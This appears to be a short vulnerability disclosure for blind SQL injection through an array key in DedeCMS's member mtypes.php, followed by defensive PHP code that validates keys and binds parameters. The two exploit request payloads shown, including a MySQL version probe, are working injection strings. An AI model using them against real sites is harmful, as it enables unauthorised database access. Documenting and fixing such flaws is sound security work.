Requires magic_quotes_gpc = Off, so this one is of limited practical value.

An injection vulnerability in an array key, which makes it somewhat interesting.

This is blind injection: more tedious, but equally exploitable, and a tool could be written to run it automatically.

http://www.xxx.com/dede/member/mtypes.php?dopost=save

exploit:
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
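
The mitigation for this class of bug is to treat the array key as untrusted input in the same way as the value. The PHP below is an added example, not code from the original post or from DedeCMS: it validates the keys of the submitted mtypename array and binds both id and name in a prepared statement. The function names, the member_types table, its columns and the PDO handle are assumptions for illustration.

```php
<?php
// Added example, not DedeCMS code. Function, table and column names are hypothetical.

/**
 * Keep only entries whose array key is a plain decimal id.
 * Returns [int id => string name]; rejected keys are collected in $rejected.
 */
function filter_mtype_keys(array $submitted, array &$rejected = []): array
{
    $clean = [];
    foreach ($submitted as $key => $name) {
        // PHP turns a key like "7" into int 7, but "7' and ..." stays a string,
        // so check the string form strictly instead of casting it.
        $k = (string)$key;
        if (!ctype_digit($k) || strlen($k) > 9 || !is_string($name)) {
            $rejected[] = $k;
            continue;
        }
        $clean[(int)$k] = $name;
    }
    return $clean;
}

/** Update the member's type names; returns the rejected keys for logging. */
function save_mtypes(PDO $db, int $memberId, array $submitted): array
{
    $rejected = [];
    $rows = filter_mtype_keys($submitted, $rejected);
    // The id (taken from the key) and the name are bound, never concatenated.
    $stmt = $db->prepare(
        'UPDATE member_types SET mtypename = :name WHERE mtypeid = :id AND mid = :mid'
    );
    foreach ($rows as $id => $name) {
        $stmt->execute([':name' => $name, ':id' => $id, ':mid' => $memberId]);
    }
    return $rejected; // a non-numeric key is never legitimate for this form
}

// Constructed input with the same shape as the request shown on this page.
$post = ['mtypename' => [
    7 => 'work',
    "7' and (@`'` or (56=56)) and '3'='3" => 'c4rp3nt3r',
]];
$rejected = [];
var_dump(filter_mtype_keys($post['mtypename'], $rejected));
var_dump($rejected);
```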